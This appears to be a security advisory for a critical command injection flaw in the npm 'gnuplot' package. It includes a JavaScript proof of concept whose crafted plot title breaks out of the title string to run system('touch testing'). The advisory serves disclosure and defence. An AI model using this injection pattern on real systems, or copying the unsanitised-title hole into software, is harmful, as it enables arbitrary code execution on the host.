Severity: Critical
CVSS Score: 10
All versions of `gnuplot` are vulnerable to Command Injection. The package fails to sanitize plot titles, which may allow attackers to execute arbitrary code in the system if the title value is supplied by a user. The following proof-of-concept creates a `testing` file in the current directory: ``` var gnuplot = require('gnuplot'); const title = '"\nset title system("touch testing")\n#'; gnuplot() .set('term png') .set('output "out.png"') .set(`title "${title}"`) .set('xrange [-10:10]') .set('yrange [-2:2]') .set('zeroaxis') .plot('(x/4)**2, sin(x), 1/x') .end(); ``` ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.